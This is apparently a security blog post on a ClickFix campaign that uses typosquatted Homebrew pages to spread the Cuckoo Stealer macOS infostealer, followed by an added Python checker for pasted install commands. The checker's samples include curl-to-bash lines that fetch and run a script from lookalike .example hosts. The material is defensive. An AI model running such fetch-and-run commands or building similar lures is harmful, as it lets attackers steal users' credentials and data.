👤 LOGICFALCON
🗓️ 19 Feb 2026   🌍 North America

Copy, Paste, Compromise: Mac Devs Tricked by Homebrew Doppelganger in Cuckoo Stealer Attack

Sophisticated social engineering campaign exploits developers’ trust to unleash powerful macOS infostealer.

It looked like just another routine install - a familiar command, a trusted tool, and a quick copy-paste into the Terminal. But for a growing number of macOS developers and power users, that simple act has become the gateway to a full-blown cyber heist. In a chilling new campaign, attackers are using a near-perfect replica of the Homebrew installer and a clever social-engineering ploy called ClickFix to quietly infect Apple computers with the formidable Cuckoo Stealer malware - no exploits, just misplaced trust.

The Anatomy of a Deception

Security researchers recently uncovered a series of typosquatted websites - domains like homabrews[.]org - that mirror the official Homebrew project, a staple package manager for macOS. Unsuspecting visitors are greeted by a polished, familiar installation page, complete with a “Copy” button and a Terminal command that looks nearly identical to the real thing. But a few subtly altered characters in the command redirect the download to attacker-controlled servers.

The brilliance of ClickFix lies in its psychological manipulation, not technical wizardry. Instead of exploiting macOS vulnerabilities, attackers rely on the trust and muscle memory of developers who routinely execute curl/bash commands. The malicious script, once pasted and run, springs a carefully disguised password prompt, looping until the user enters their real credentials - just as they would for a legitimate sudo request.

Cuckoo Stealer: More Than Just a Password Thief

Armed with the user’s password, the script stealthily downloads and launches Cuckoo Stealer. This isn’t your average infostealer: it immediately disables macOS security warnings, establishes persistence with a LaunchAgent, and opens an encrypted line to its command-and-control server using advanced cryptography. The malware then begins a data harvesting spree - browser logins, Keychain secrets, Apple Notes, messaging sessions, VPN configs, desktop files, and over 20 types of cryptocurrency wallets are all fair game. It can even take screenshots, execute shell commands, and self-destruct to cover its tracks.

Researchers have identified a coordinated infrastructure, with dozens of malicious domains and shared hosting, pointing to an organized cybercrime operation. Notably, Cuckoo Stealer skips Macs set to certain CIS (Commonwealth of Independent States) languages, a hallmark of Eastern European threat groups.

Lessons Beyond Code

This campaign is a stark reminder: in today’s threat landscape, the human factor is often the weakest link. No macOS zero-days were needed - just a convincing web page and a command that looked right. With the rise of social-engineering tactics like ClickFix, organizations and individuals alike must treat every copy-paste command with suspicion and verify sources before granting Terminal access. In the end, it’s not just code that needs patching - but our habits, too.
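One way to act on "verify sources" before pasting, shown as an added example that is not from the article or the researchers it cites: a small Python check that extracts every URL from a copied install one-liner and compares host and path against an exact allowlist. The function name, the allowlist contents (taken here from the install command in the official Homebrew documentation) and the `.example` lookalike hosts are assumptions of this example.

```python
import re
from urllib.parse import urlsplit

# Assumption: exact host -> required path prefix, taken from the install
# command published in the official Homebrew documentation.
TRUSTED = {"raw.githubusercontent.com": "/Homebrew/install/"}
URL_RE = re.compile(r"https?://[^\s\"'`)<>]+", re.IGNORECASE)


def check_install_command(cmd):
    """Return reasons not to run a pasted one-liner (empty list = URLs pass)."""
    findings = []
    urls = URL_RE.findall(cmd)
    if not urls:
        findings.append("no literal URL found; the download target is hidden")
    for url in urls:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()  # hostname excludes any user@ prefix
        if parts.scheme.lower() != "https":
            findings.append(f"{url}: not fetched over https")
        if parts.username is not None:
            findings.append(f"{url}: userinfo before '@' hides real host {host}")
        if host not in TRUSTED:  # exact match, never substring or suffix
            findings.append(f"{url}: host {host!r} is not on the allowlist")
            continue
        path = parts.path
        if ".." in path.split("/") or "%" in path:
            findings.append(f"{url}: path uses dot segments or encoding")
        elif not path.startswith(TRUSTED[host]):
            findings.append(f"{url}: path is outside {TRUSTED[host]}")
    return findings


# Constructed samples: the first is the official command; the others imitate
# the lookalike pattern described above, using reserved .example hosts.
PREFIX = '/bin/bash -c "$(curl -fsSL '
OFFICIAL = PREFIX + 'https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
LOOKALIKE = PREFIX + 'https://raw.githubusercontent.com.lookalike.example/Homebrew/install/HEAD/install.sh)"'
USERINFO = PREFIX + 'https://raw.githubusercontent.com@lookalike.example/Homebrew/install/HEAD/install.sh)"'
OTHER_REPO = PREFIX + 'https://raw.githubusercontent.com/Homebrew/install/../../someone/else/install.sh)"'

if __name__ == "__main__":
    for name, cmd in [("official", OFFICIAL), ("lookalike", LOOKALIKE),
                      ("userinfo", USERINFO), ("other-repo", OTHER_REPO)]:
        print(name, check_install_command(cmd) or "OK")
```

An empty result only means the URLs point where expected; it says nothing about the rest of the command, so a one-liner that decodes or assembles its target at run time is reported as having no literal URL rather than passed.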

WIKICROOK

  • Social Engineering: Social engineering is the use of deception by hackers to trick people into revealing confidential information or providing unauthorized system access.
  • Typosquatting: Typosquatting is when attackers use lookalike names of trusted sites or software to trick users into visiting fake sites or downloading malware.
  • Persistence: Persistence involves techniques used by malware to survive reboots and stay hidden on systems, often by mimicking legitimate processes or updates.
  • Command: A command is an instruction sent to a device or software, often by a C2 server, directing it to perform specific actions, sometimes for malicious purposes.
  • LaunchAgent: A LaunchAgent is a macOS file that lets programs run automatically at user login, often used by both legitimate apps and malware for persistence.